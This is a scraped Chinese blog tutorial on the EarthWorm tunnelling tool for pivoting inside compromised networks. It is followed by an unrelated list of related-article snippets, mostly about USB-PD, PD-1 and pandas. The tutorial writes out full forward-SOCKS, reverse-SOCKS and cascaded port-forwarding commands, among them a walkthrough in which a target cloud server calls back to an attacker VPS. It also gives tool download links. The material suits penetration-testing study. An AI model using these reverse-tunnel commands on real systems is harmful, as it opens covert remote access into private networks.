内网穿透大杀器--EarthWorm

article/2025/9/26 9:41:41

0x00 前言
如果感觉本文对你有帮助,请在文章末尾点个赞,谢谢表哥们支持!
当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了?
不来一次内网漫游,渗透是不完整的,哈哈。

本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。



它强在哪些方面呢?
1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的云服务器上。)
2.以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持。

支持平台列表:(可跨平台反弹)

ew_for_Win.exe        适用各种Windows系统(X86指令集、X64指令集)        Windows7、Windows XP
ew_for_Linux32        各常见Linux发行版 (X86 指令集 CPU)        Ubuntu(X86)/BT5(X86)
ew_for_linux64        各常见Linux发行版 (X64 指令集 CPU)        Ubuntu(X64)/Kali(X64)
ew_for_MacOSX64        MacOS系统发行版 (X64 指令集)        苹果PC电脑,苹果server
ew_for_Arm32        常见Arm-Linux系统        HTC New One(Arm-Android)/小米路由器(R1D)
ew_mipsel        常见Mips-Linux系统 (Mipsel指令集 CPU)        萤石硬盘录像机、小米mini路由器(R1CM)

 

0x01 使用方法

以下所有样例,如无特殊说明代理端口均为1080,服务均为SOCKSv5代理服务.
该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。
1.正向SOCKS v5服务器

$ ./ew -s ssocksd -l 1080

2. 反弹 SOCKS v5 服务器
  这个操作具体分两步:
  a) 先在一台具有公网 ip 的主机A上运行以下命令:

$ ./ew -s rcsocks -l 1080 -e 8888 

b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口

$ ./ew -s rssocks -d 1.1.1.1 -e 8888 

成功。
3. 多级级联
工具中自带的三条端口转发指令,它们的参数格式分别为:

$ ./ew -s lcx_listen -l  1080   -e 8888
$ ./ew -s lcx_tran   -l  1080   -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave  -d 1.1.1.1 -e 8888    -f 2.2.2.3  -g  9999

通过这些端口转发指令可以将处于网络深层的基于TCP的服务转发至根前,比如 SOCKS v5。
首先提供两个“二级级联”本地SOCKS测试样例:
  a) lcx_tran 的用法

$ ./ew -s ssocksd  -l 9999$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

b) lcx_listen、lcx_slave 的用法

$ ./ew -s lcx_listen -l 1080 -e 8888$ ./ew -s ssocksd    -l 9999$ ./ew -s lcx_slave  -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

 

再提供一个“三级级联”的本地SOCKS测试用例以供参考

$ ./ew -s rcsocks -l 1080 -e 8888$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999$ ./ew -s lcx_listen -l 9999 -e 7777$ ./ew -s rssocks -d 127.0.0.1 -e 7777

数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

 

0x02 实战测试(分为本地测试和公网IP测试)

一般最常用的就是上面的第二条:反弹 SOCKS v5 服务器。
使用实例1:
目标机器:

ew.exe -s rssocks -d 2.2.2.2 -e 888

(2.2.2.2为想要反弹到的机器)
攻击机器:

ew.exe -s rcsocks -l 1008 -e 888

(监听888端口,转发到1008端口)
测试环境:
在这里我直接用我的本机Win10作为目标机器,将虚拟机Win7作为攻击机器。

 

本机Win10 ip:192.168.62.1
Win7 ip:192.168.62.128


 

ew_for_Win.exe -s rcsocks -l 1008 -e 888

接收888端口的数据并转发到1008端口。



此时正在监听。

目标机器Win10运行命令:

ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888



此时攻击机器会弹出连接成功的提示:
 

好了,到此Win10的SOCKS5代理就反弹到Win7攻击机上了。
只需要一个Socks5连接工具就可以连接到本地1008端口来代理访问了。
推荐工具SocksCap64。

 

 

在代理处配置127.0.0.1:1008
代理已连接。
使用实例2:
攻击者洛杉矶 Linux VPS :45.78.*.*
目标阿里云服务器 Win2008:47.93.*.*

攻击者Linux监听:

[root@centos6 ~]# ./ew_for_Linux32 -s rcsocks -l 1008 -e 888

目标阿里云服务器反弹:

ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888

攻击机器监听出现:rssocks cmd_socket OK!
表示反弹成功。

0x03 工具下载

http://rootkiter.com/EarthWorm/download/ew.zip
http://sw.bos.baidu.com/sw-search-sp/software/b4a67d595e031/sockscap64w_V3.3_setup.exe


http://chatgpt.dhexx.cn/article/UV3TFrdq.shtml

相关文章

EW(EarthWorm) 反向 socks5 代理

今天本想对学校的内网服务器进行人生中第一次横向渗透,奈何情况不允许,但好歹学习了一些东西,总要写下来保存 工具: EW: https://github.com/idlefire/ew proxychains: https://github.com/rofl0r/proxychains-ng 小米随身wifi…

使用Earthworm (EW) 做Socks5代理

正向代理 1.选择合适的ew文件(将文件ew_…改为ew.exe,为了在命令行少敲几个字母),上传到边缘服务器 2.边缘服务器输入 ew.exe -s ssocksd -l 8000 3.可借助proxifier工具配置攻击机整台机器的代理(proxifier添加代理服务器,ip为边…

EarthWorm结合proxifier的使用学习

拿下一个目标机器的web权限后,如何在本机就可以通过这台被拿下webshell的机器访问内网的其他主机的端口服务呢? 拿下一个shell后,想要访问这个shell主机的其他内网机器的服务,可以用earthworm作为一个流量转发,把ew对应…

内网渗透-Earthworm的简单使用(内网穿透工具)

Earthworm的简单介绍(一) 文章目录 EarthWorm下载地址1. 普通网络 1.1 跳板机存在公网IP 1.1.1 网络环境1.1.2 使用方法1.1.3 流量走向 1.2 跳板机不存在公网IP,可出网 1.2.1 网络环境1.2.2 使用方法1.2.3 流量走向 2. 二级网络 2.1 一级跳…

基于EarthWorm的正反向socks5代理

EarthWorm EarthWorm(ew)是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,可在复杂网络环境下完成…

earthworm系列-earthworm介绍

earthworm的官方网站:http://www.earthwormcentral.org 1 Earthworm 简介 Earthworm 项目始于1993 年,主要目的是为了解决美国地震区域台网出现的问题。当时,区域内的地震台网存在的主要问题有:观测设备陈旧,…

内网渗透工具Earthworm简单使用

EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限…

【内网—内网转发】——代理转发_ew(Earthworm)代理转发

文章目录 一、环境准备:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:…

苹果xsmax是什么接口_为什么苹果PD快充线头是银色而非金黄色?原来那根本就不是镀的银...

苹果开放第三方授权后,目前市面上已有不少苹果MFi认证的PD快充线,1小时就能充满iPhone X。苹果PD数据线,即USB-C to Lighting数据线,是苹果自家定义的一套数据线规范,一端为Type-C接口,另一端为苹果Lightin…

PD诱骗方案

方案1 如果在小制作中使用pd诱骗,可以参考国产方案 一个网友的设计 芯片手册提供的原理图如下 原理图1 原理图2 原理图3 原理图4 如果在一些小制作中使用还是比较方便的。 方案2 上面方案缺点仅支持PD2.0,不具有PPS,用于一些简单应用还是…

USB-PD 协议解析 - 简单易懂协议详解

目录 1. 简介 2. USB PD3.0 通信流程 2.1 发送数据包 2.2 接收数据包 2.3 双相标记编码(BMC) 2.4 符号编码(4B5B) 3. 数据包格式 3.1 前导码(Preamble) 3.2 SOP*(Start of Packet Sequence) 3.3 …

雷达干扰技术(一)PD雷达的特征

文章目录 1 多普勒频率2 PD雷达基本原理和组成3 PD雷达的信号特征 1 多普勒频率 雷达使用多普勒频率来提取目标的径向速度(距离变化率),以及区分运动和静止目标与物体,例如杂波。 多普勒现象描述了由于目标相对于辐射源的运动而…

详解PD3.0协议

通过65W充电头,给电池充电,中间有个充电芯片CCG3PA,电池可充可放,也就是PD的Power role可以是Source也可以是Sink。 在充电时的PD协议中的Device Discovery,通过SOP_Prime类型的消息进行交互,5个VDO包含了必要信息。其中cable VDO会告知自己是3A还是5A的线,不同的线能承…

PD-1和PD-L1到底是什么?

PD-1全称程序性死亡受体1,英文名字为Programmed Death 1,是一种重要的免疫抑制分子,为CD28超家族成员。以PD-1为靶点的免疫调节在抗肿瘤、抗感染、抗自身免疫性疾病及器官移植存活等方面均有重要的意义。其配体PD-L1也可作为靶点,…

药物相关 PK(药代动力) 、PD(药效)指标知识

1、PK(药代动力) Pharmacokinetic PK(Pharmacokinetics)主要研究药物在体内的吸收、分布、代谢和排泄过程,主要包括药物的药代动力学参数,如清除率、半衰期、分布容积等 PK代表药物的药代动力学&#xff…

pd.melt

一、函数 pd.melt( [frame, id_varsNone, value_varsNone, var_nameNone, "value_namevalue", col_levelNone] 参考官方文档 melt: V (使)熔化,融化 pd.melt将多列数据进行融合。 二、参数 id_vars: tuple, list, or ndarray, optional 用作标识符的列…

一文读懂USB3.1、USB Type-C、USB PD到底是什么?

USB3.1、USB Type-C、USB PD这几个英文单词应该是目前与USB接口相关的较热门的英文单词,大家或多或少都会在有意或者无意下接触到与其相关的一些信息,但是相对于大部分人来说也仅仅是知道有这么一个东东,但是对其功能及用途却并不了解&#x…

USB-PD 协议

USB-PD(Power Delivery)是基于USB Type-C的一种电源供电标准,最大供电功率可达100瓦(W);随着USB Type-C的普及,越来越多的设备(手机、平板、显示器、工作站、充电器等)使…

PD功能介绍

PD(Placement Driver),集成了ETCD, ETCD的Raft保证了数据的一致性; PD作用 整个集群TiKV元数据的存储分配全局ID和事物ID生成全局时钟TSO-事物开始时间、提交时间等搜集集群信息进行调度搜集Label功能支持高可用提供TiDB Dashboard功能 TSO physical …

python中pd是什么意思_python pd

广告关闭 腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元! 这里我们的目的是通过智能过滤器来减少查询cpu时间我想要通过其他数据框列名来过滤pd.read_sql中的列可能吗? 第1步:df1数据帧age1和age3是我未来的pd.read_s…